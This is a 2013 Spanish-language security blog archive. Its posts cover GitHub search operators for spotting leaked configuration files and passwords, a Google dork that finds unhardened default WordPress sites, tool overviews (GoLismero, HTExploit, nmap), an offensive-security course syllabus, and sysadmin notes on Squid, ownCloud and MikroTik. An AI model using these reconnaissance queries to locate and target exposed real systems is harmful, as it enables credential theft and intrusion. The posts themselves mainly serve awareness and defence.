Ahora veamos aquellos operadores que GitHub nos deja utilizar:

@<usuario>
Es el más simple para verificar si existe y ver todas las coincidencias en los resultados. Ej. @elcodigok

extension:<extension>
podemos utilizar este operador para especificar la extensión de algún archivo como ser, py, xml, yaml, aspx, etc. Ej. extensio:py

created:"YYYY-MM-DD" 
nuestra búsqueda puede ser más fina si tenemos la posibilidad de especificar una fecha de creación o con ">YYYY-MM-DD YYYY-MM-DD" un rango de fecha. Ej. created:">2012-08-01 2013-08-01"

repo:<usuario>/<repositorio>
Cuando queremos espicificar un repositorio particular podemos utilizar el operador repo. Ej. repo:elcodigok/mtff

path:</algun/path/busqueda>
Es una forma de especificar un path dentro del repositorio donde, además podemos complementarlos los operadores de usuario, extension y repo. Ej. path:/public_html/


26 de agosto de 2013

GitHub Hacking

Esto de encontrar información interesante en los buscadores se convirtió en un clásico, tanto Google, Yahoo! como Bing incorpora entre sus opciones avanzadas operadores potentes que nos permiten encontrar, casi cualquier cosas que nos propongamos, extensiones de archivos, nombres, contenidos, URL's, etc.


Claro está que, GitHub no se iba a quedar atrás, y ahora es posible realizar búsquedas avanzadas que nos permite encontrar en el código fuente de los usuarios información realmente sensible.

Estoy seguro que en la próxima entrega vamos a explicar todos y cada uno de los operadores de búsqueda más interesantes, pero la idea es tomar un poco conciencia de que es lo que estamos haciendo y publicando en GitHub, y la realidad es que muchos programadores están subiendo código sin ocultar sus archivos de configuraciones, conexiones a bases de datos, contraseñas, Path directory, etc.

Si bien está bueno tener en nuestra cuenta de usuario en GitHub una gran actividad en los commits, branch y fork con otros proyectos, no está tan bueno “desnudar” la aplicación y mostrar absolutamente toda su información, por más que lo publiquemos como licencia GPL y sea Software Libre, tenemos que tener en cuenta que este código puede ser descargado por cualquiera con cualquier fin.

La solución está en .gitignore

Por ejemplo si no quieren subir algunos archivos a GitHub pero que están en su proyecto, les recomiendo que lean las características del archivos .gitignore antes de realizar algún commit y posteriormente un push, tómense el tiempo de chequear este archivo para evitar subir otros archivos con contenidos que puede ser utilizado para comprometer sus servidores, cuentas, etc.

GitHub Hacking está muy interesante y les propongo que me acompañen en las próximas entregas para continuar aprendiendo que es lo que podemos obtener si utilizamos algunos de sus operadores.

Saludos!

25 de agosto de 2013

Auditando la seguridad de una web con GoLismero

Esta sin duda es una de las herramientas de seguridad que hasta que no las pruebas, no ves todo el potencial que te puede brindar. Así que para corroborar las buenas críticas, este fin de semana comencé a utilizarlo para algunas auditorías que tenía que terminar.

GoLismero es una herramienta de seguridad que han presentado en la convención OWASP orientada a realizar auditorías de páginas web para buscar posibles agujeros de seguridad existentes en estas, aunque también podría ser utilizado para buscar fallos en cualquier otro tipo de servicios (redes, servidores, etc).


Algunas de las características que presenta GoLismero son:

  • Es una herramienta multiplataforma con soporte para Windows, Linux, Mac y BSD
  • No necesita dependencias, todo el código está escrito en Python.
  • En comparación con otros frameworks escritos en Python, GoLismero está optimizado y ofrece un resultado óptimo.
  • Es una herramienta muy fácil de usar.
  • La herramienta puede recopilar y analizar resultados recogidos por otras herramientas de seguridad como sqlmap, xsser, openvas, dnsrecon, theharvester, etc.
  • Permite la creación de plugins de forma sencilla.


22 de agosto de 2013

Nueva Comunidad SoyAdmin en G+


Desde hace un tiempo estaba con la idea de generar un espacio para todos los Administradores de Sistemas, un lugar en donde estemos identificados y tengamos la posibilidad de colaborar, dejar nuestras preguntas, recomendar herramientas, difundir algún evento, etc.

Por eso, están todos invitados a formar parte de esta nueva Comunidad para Administradores de Sistemas, SoyAdmin creada en la plataforma de Google+

Sumate!

Enlace | Comunidad SoyAdmin

18 de agosto de 2013

Google Hack: Hello WordPress!

Hace ya un tiempo que no publico un nuevo dork para Google, por eso el otro día buscando nuevas mejoras para el proyecto #WPHardening, la herramienta creada para fortalecer WordPress me encontré con una nueva e interesante consulta en Google.

Si alguna vez instalaron WordPress por defecto, seguro notaron que esa instalación agrega registros en la base de datos por defecto, entre esos encontramos un post cuyo id=1 junto a un comentario, un clásico "Hello World!" pero en WordPress.

Esto es lo que vamos a consultarle a Google, que me busque todas aquellas páginas que dejaron esa información por defecto, de la siguiente manera:

intitle:"Hello World!" inurl:"/?p=1"


Por supuesto que con esto no encontramos ningún fallo, bug, etc. no era esa la intención, sin embargo podemos ver en muchos de los casos que si no fueron capaces de eliminar un simple post creado por defecto nos podemos imaginar si habrán fortificado todo su CMS.

¿Ustedes que creen?

Saludos!

16 de agosto de 2013

Presentación de HTExploit en la Ekoparty 2012

En la última edición de la Ekoparty 2012, Maxi Soler y Matias Katz presentaron la herramienta HTExploit, explicando los diferentes fallos en las configuraciones que generalmente se realiza al intentar proteger con usuarios y claves diferentes directorios en servidores web.


Matías Katz y Maxi Soler - HTExploit from ekoparty on Vimeo.

HTExploit es una herramienta open-source escrita en Python, que explota una debilidad en el modo en que los archivos htaccess pueden ser configurados para proteger un directorio web mediante autenticación. A través del uso de esta herramienta, cualquiera podría ser capaz de listar los contenidos de un directorio protegido de esta forma, bypaseando el proceso de autenticación.

7 de agosto de 2013

Experiencias aprendidas al implementar Squid3 y Active Directory

Lo que les voy a comentar en las siguientes líneas no va a ser un tutorial sobre como integrar SQUID3 y Active Directory, aunque quizás más adelante lo escriba, simplemente quería comentarles mi experiencia al unir estas tecnologías como SysAdmin.

Antes de ponernos a trabajar, lo primero que hicimos fue evaluar todas las alternativas que vimos que existían en el mercado, la idea siempre fue utilizar la gran base de datos de usuarios de Active Directory registrados en un dominio Windows 2012 y utilizarlos para mantener un control en los accesos y abusos a Internet, de esa forma nos aseguramos de no dar usuarios diferentes, contraseñas distintas, etc.

Entre las alternativas evaluadas encontramos bajo servidores GNU/Linux Zentyal y todos sus servicios asociados, por otro lado encontramos uno similar llamado Artica, estas se caracterizaban por tener prácticamente todo el software pre-instalado, con lo cuál solo quedaba configurar algunos parámetros y comenzar a administrarlos en un entorno web, mucho más amigable para los administradores.

Esto fue así que comenzamos por instalar Artica, probarlo por algunas semanas, comprender su funcionamiento y pasarlo directamente a producción. Si bien Artica esta basado en Debian, la verdad es que tiene muchas modificaciones incluyendo su Fronend para administrarlo.

Y en un momento, pasó lo que uno no quiere que pase, Luego de una actualización o quizás un parámetro mal configurado de un momento a otro lo teníamos off.line al servicio por errores que en el apuro y quizás desconocimiento de la distribución no encontrábamos.

Entonces de aquí nuestro primer gran error, Utilizar y luego implementar en producción sistemas que no conocíamos solo por satisfacer una función.

Lo siguiente fue creer y fiarnos de la estabilidad de ese sistema que no conocíamos bien pero que era fácil administrarlo.

Desde ya Artica y Zentyal son excelente producto y recomiendo que los descarguen, pruebe e implementen.

Para solucionar esto, se decidió implementar Debian 7.1 Wheezy que es el más estable hasta la fecha, Squid3, Kerberos y Samba. Luego de unas semanas de fucionar estas tecnologías logramos sincronizar nuestro nuevo servidor con los dominios, autenticación por Kerberos, instalación del proxy SQUID3 y finalmente la implementación de los usuarios de Active Directory en el proxy, de esta forma podemos formar nuestras propias ACL de squid simplemente formando grupos en la administración de Active Directory.

Ahora bien, que ganamos con todo esto?


En primer lugar, utilizar y administrar un sistema que si es conocido por el equipo, en modo consola y de la manera más rustica pero en definitiva teniendo el control de la situación en todo momento.

Por otro lado utilizando el mismo servidor ganamos muchísimo ahorro de consumo en los recursos, por alguna razón Artica nos demandaba muchos más recursos en memoria, disco y procesador.

Por otro lado, pudimos ver y aprender como integrar estas tecnologías, ver de cerca realmente como crear nuestras listas de control de acceso, permisos, aceleración a Internet, etc.

Al final del días mi recomendación es NO utilizar aquel servicio que promete mucho y que es simple de administrar, busquen en sus conocimientos aquello que conocen que pueden manejar y llévenlo al extremo, y solo de esa forma se van a dar cuenta que tener el control sobre lo que pasa en su servidor no tiene precio.

1 de agosto de 2013

Curso sobre Seguridad Ofensiva

No quería dejar de compartir esta información que dejaron a disposición en la Universidad del Estado de Florida donde W. Owen RedWood y Xiuwen Liu impartieron un completo curso sobre Seguridad Ofensiva.

La clase está programada para ser impartida en 15 semanas de la siguiente forma:

  • Week 1 (Intro / Overview)
    • Lecture 1: Intro, Ethics, & Overview
    • Lecture 2: Linux Overview
  • Week 2 (Overview / Code Auditing)
    • Lecture 3: Windows Overview
    • Lecture 4: Rootkits; Code Auditing
  • Week 3 (Reverse Engineering Workshop Week)
    • Lecture 5: x86 Reverse engineering
    • Lecture 6: x86 Reverse engineering 2
  • Week 4 (Exploit Development)
    • Lecture 7: Fuzzing and Exploit Development 101
    • Lecture 8: Shellcode and Exploit Development 102
  • Week 5 (Exploit Dev / Networking)
    • Lecture 9: Exploit Development 103: SEH Exploitation, Heap Sprays, and Executable Security Mechanisms
    • Lecture 10: Networking 101: Data Layer, Link Layer, and IP layer
  • Week 6 (Networking / Web Application Hacking)
    • Lecture 11: Networking 102: TCP layer, Important Protocols, Services, Portscanning, ARP
    • Lecture 12: Web application Hacking 101
  • Week 7 (Web Application Hacking)
    • Lecture 13: Web Application Hacking 102: Big picture of topics so far, SQLi, XSS
    • Lecture 14: Web Application Hacking 103: SSL attacks, advanced techniques
  • Week 8 (Web Application Hacking / Exploit dev)
    • Lecture 15: Web Application Hacking 104 & Exploit Development 104
    • Lecture 16: Midterm review & Exploit Development 105 (ROP)
  • Week 9: (Special Topics)
    • Lecture 17: The Modern History of Cyber Warfare
    • Lecture 18: Social Engineering
  • Week 10 (Metaspl0it):
    • Lecture 19: Metasploit
  • Week 11 (Post Exploitation and Forensics):
    • Lecture 20: Meterpreter and Post Exploitation
    • Lecture 21: Volatility and Incident Response:
  • Week 12 (Physical Security):
    • Lecture 22: Physical Security Workshop: Lockpicking, USB mischief, and BacNET/SCADA system security
  • Week 13 (Malware / Student Presentations):
    • Lecture 23: Advanced Malware Techniques
  • Week 14-15 (Student Presentations)


Excelente Material publicado para aprender más sobre estos temas, por otro lado aprovecho la oportunidad para comentarles que mi amigo Ismaél González de Kontrol0.com está publicando muchísima información sobre un curso de Backbox, una interesante distribución GNU/Linux para pentesters.

Saludos!

Enlace | Curso de Seguridad Ofensiva - Segu-Info

28 de julio de 2013

Barnaby Jack


Este es mi pequeño homenaje a Barnaby Jack, un verdadero Hacker que fue encontrado muerto el último 25 de Julio en su apartamento de San Francisco.

Barnaby Jack estaba por presentar en BlackHat USA 2013 como atacar humanos mediante dispositivos médicos, podes ver el enlace aquí.

24 de julio de 2013

Rooted CON 2013 - Wi-Fi: Why iOS Fail inexplicably?

En esta oportunidad Raúl Siles nos sorprende con una extraordinaria presentación sobre seguridad en los dispositivos móviles y las redes Wi-Fi que les aseguro no tiene desperdicio alguno.

La seguridad de las redes Wi-Fi ha evolucionado durante la última década hasta alcanzar un nivel de madurez aceptable. En consecuencia, los ataques sobre las tecnologías Wi-Fi también han evolucionado desde las infraestructuras de red a los equipos cliente. Inexplicablemente, hoy en día los dispositivos móviles basados en iOS y Android (y otros), aún presentan vulnerabilidades relevantes independientemente de los mecanismos de seguridad Wi-Fi empleados: Open, WEP, WPA y WPA2-PSK, e incluso WPA y WPA2-Enterprise. "¿Acaso crees que lo que respiras ahora es aire?"...


Raúl Siles - Wi-Fi: Why iOS (Android and others) Fail inexplicably? [Rooted CON 2013] from rootedcon on Vimeo.

23 de julio de 2013

Mi almacenamiento en la nube privada con ownCloud


Desde hace ya un tiempo que estoy jugando con ownCloud, probando cada uno de sus componentes y el comportamiento que tiene ante sobrecargas en cuanto a usuarios, archivos y demás recursos.

La verdad que es una excelente herramienta para poner en producción y mantener tus archivos sincronizados, para aquellos usuarios que acostumbran a utilizar varios dispositivos a la vez y necesitan acceder a sus archivos desde cualquier terminal.

Entre las características básicas de ownCloud como servicio privado de almacenamiento, accesibilidad y sincronización de archivos, compartir información entre los usuarios, una interfaz web muy intuitiva para los usuarios, buscadores de elementos, clientes multi plataformas para Windows, Mac OSX y GNU/Linux, Calendario y Libreta de Contactos para sincronizar, la última versión 5.x cuenta con la posibilidad de extender a un almacenamiento externo y fusionar la nube privada con las publicas más populares como DropBox, GoogleDrive, S3, etc. Finalmente cuenta con servicios de Backups y migración, Task, API's públicas, Logging para auditorías y debugging en la instalación y algo que probé muy de cerca es la integración con los usuarios de LDAP/Active Directory que realmente funciona de maravilla.

Algo que me olvidaba de mencionar, es su Store de Aplicaciones para continuar extendiendo los servicios de ownCloud, allí es posible conseguir aplicaciones simples creada por la comunidad de desarrolladores.

Como les comentaba al principio del artículo, ownCloud realmente está demostrando en estos últimos años la excelencia en el desarrollo de nubes privadas, ya que con muy poco es posible montar un servicio indispensables para las compañías y escalarlo rápidamente dependiendo de las necesidades de cada uno.

Hace no mucho tiempo, publiqué y reporte un Google Dork sobre ownCloud que permitía tener acceso a archivos sin la necesidad de contar con un usuario en el sistema, esto se debía básicamente a una mala configuración en el servidor y quizás a algunos componentes que se podían incorporar a ownCloud, a día de hoy estas cosas se mejoraron en un 100% y los desarrolladores de ownCloud ya se encuentra capando mucho de estos componentes buscando mejorar la seguridad, por otro lado su sistema de actualización es constante.

5 de julio de 2013

MikroTik Firewall Framework versión de evaluación


Luego de un tiempo de trabajar con dispositivos MikroTik me surgió una necesidad muy puntual que en este momento la estoy transformando en una herramienta, el proyecto lo llamé MikroTik Firewall Framewok (MTFF) y tiene como objetivo crear un constructor de reglas de firewalls para los dispositivos MikroTik por medio de la configuración de un archivo.

La idea es utilizar un archivo de configuración de formato YAML, totalmente legible gracias a su tabulación, desde allí especificar varios parámetros que son necesario para lograr construir un firewall completo. Donde finalmente quedará importarlo al dispositivo y posteriormente ejecutarlo para que termine de crear todas las reglas.

MikroTik Firewall Framework está programada en Python, bajo la licencia GNU/GPLv3 y por ahora se encuentra para ejecutarlo en la consola de comandos, para poder descargar el código fuente podemos hacerlo directamente desde GitHub.

$ git clone https://github.com/elcodigok/mtff.git
Cloning into 'mtff'...
remote: Counting objects: 89, done.
remote: Compressing objects: 100% (76/76), done.
remote: Total 89 (delta 34), reused 62 (delta 10)
Unpacking objects: 100% (89/89), done.

Ahora podemos crear un archivo de configuración similar al que aparece en el README y llamarlo mtff.yaml por ejemplo y finalmente interpretarlo de la siguiente manera

$ ./mtff.py f /path/del/archivo/mtff.yaml

Toda la salida de este comando es el firewall que tenemos y que al mismo lo podemos redireccionar a un archivo de salida listo para ser importados en nuestro dispositivo MikroTik

$ ./mtff.py f /path/del/archivo/mtff.yaml > firewall.rsc

Aquellos que tuvieron la oportunidad de administrar servidores GNU/Linux, sabrán que este proyecto fue inspirado por FireHOL, un espectacular constructor de firewalls para estos sistemas, que basado en una configuración simple es posible obtener una estructura de firewall robusta.

MikroTik Firewall Framewok esta en un nivel funcional de evaluación, donde invito a todos a colaborar de este proyecto, aportando sus líneas de códigos, ideas, sugerencias y por supuesto difusión para que pueda llegar a todas partes.

Espero sus aportes y comentarios. Saludos!

Enlace | MikroTik Firewall Framework

28 de junio de 2013

El SPAM es cada vez peor


Definitivamente esto ya no puede ni considerarse como SPAM, muy mal elabora, tan poco creíble que no el antispam de Yahoo! Lo detecta.

Saludos!

25 de junio de 2013

Recopilación de información con NMAP (I)

Estoy seguro que en algún momento escucharon la frase, "NMAP es más que un escaneador de puertos" y realmente esto es así, lo primero que intentamos hacer siempre, es consultar con NMAP cuáles son los servicios activos de un dispositivos, pero gracias a sus script podemos extender su funcionalidad.

La idea es poder publicar varias entradas recomendando los diferentes scripts que nmap y su comunidad de programadores nos ofrece y que podemos sacar partida de ellos.

En este primer ejemplo vamos a conocer "whois" un script que realiza consultas a los Regional Internet Register (RIR) de esta forma podemos llegar a conocer más detalles sobre la asignación del dominio, responsables de la gestión, Hosting alojados, etc.

Realmente su implementación es muy simple y sumamente interesante para consultar, y lo podemos hacer de la siguiente manera:

24 de junio de 2013

Debugging the brain

Luego de un largo fin de semana, con algo de descanso y trabajo en casa, y además, luego de leer los nuevos cambios de la salida de WordPress 3.5.2, papers y ver algunos videos, encontré uno publicado hace un par de días de Matias Katz en el último TEDxUTN llamado “Debugging the brain

Ideal para compartir y recomendarlo a todos mis amigos Geek's, realmente es interesante que  TEDx llame a Hacker para este tipo de jornadas para compartir sus ideas.



Saludos!

Entradas populares